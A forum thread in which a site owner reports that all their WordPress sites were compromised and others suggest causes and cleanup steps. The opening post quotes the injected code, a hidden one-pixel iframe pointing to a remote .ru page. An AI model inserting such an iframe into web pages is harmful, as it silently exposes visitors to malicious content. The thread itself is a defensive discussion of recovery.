Everyone of my wordpress sites got hacked with this....

angelas111

Elite Member
Jan 4, 2009
1,648
1,052
<html><body><iframe src="http://fisherstan.ru/plugins/editors/tinymce/jscripts/tiny_mce/themes/kal/index.php?out=1282574984http://fisherstan.ru/plugins/editors/tinymce/jscripts/tiny_mce/themes/kal/index.php?out=1282574984" width="1" height="1" frameborder="0"></iframe></body></html>>

if i am not allowed to post this here. please remove or let me know. but all the sites were on the same server. this was injected into all of the index.php files. i have since deleted it from all of them and sites are back to normal. but does anyone know how this can happen? it happened to every site on that hosting account.
 
Most likely it came from your computer. There are a few out there that will steal your ftp passwords and load a trojan to all of your sites.

You need to make sure that your computer is 100% clean. In addition to your anti-virus also check with malwarebytes and superantispyware.

Once your computer is clean you need to change all of your ftp passwords and then check all the files on your site paying special attention to all the index pages (not just the main ones) and all your .js files. You should also change your admin password and your database password as well.

If you have recent backups then just delete the files and upload the clean ones. If not download the files to your computer and check them using window grep for the malicious code and then upload when clean.
 
Since it's a wordpress blog, I find it more likely that there is a flaw in the security of one of your plugins.. Make sure that you are running the latest Wordpress version, and that all plugins are up to date.
 
Run MalwareBytes and look at your FTP logs.. I caught a similar thing a while ago (causing iframes on all of my sites and BSOD's), in the end I had to throw my computer away, god that was a 'good' virus, couldn't access anything anymore, it'd just crash. So if there's nothing happening with your computer yet, try as much as you can to get rid off the virus. It could also be a hacked server on your hosts end.
 
Some days back 1 of my sites also got hacked. Though only the index.php was changed from the hacker and database was kept intact i saw. I just downloaded the whole database and had it scanned from Kaspersky and it found tons ofVvirus/Trojan.

I contacted the hosting provider and he told me that its becoz of the Plugins i use. Now i run over 25 plugins on my WP blogs. Dont really know which one was infected!! :|
 
This recently happened to one of my site and the person left a calling email from Turkey. My suspicion falls on proxy usage. The way i understand it, the proxy site can capture anything you type into your browser.

Becareful, what proxies you use or delete the proxy before punching in your sensitive password.
 
wow, 3 years later. i totally forgot about this. a couple of my wordpress sites got hacked again and i googled fisherstan.ru and this thread was the first result. wow, it bit me again.
 
Last edited:
Happened to me, downloaded a few nulled wordpress themes and they ran scripts on my hosting shutting down the whole shared hosting server.
I diddn't even have the theme installed, it was just sitting in my wordpress folder with no use for it. Luckily I make backups once a week
 
Wow. That sucks. I hope you backed up all of your info. My old host got hacked regularly, I moved quickly to switch hosts.
 
Back
Top
AdBlock Detected

We get it, advertisements are annoying!

Sure, ad-blocking software does a great job at blocking ads, but it also blocks useful features and essential functions on BlackHatWorld and other forums. These functions are unrelated to ads, such as internal links and images. For the best site experience please disable your AdBlocker.

I've Disabled AdBlock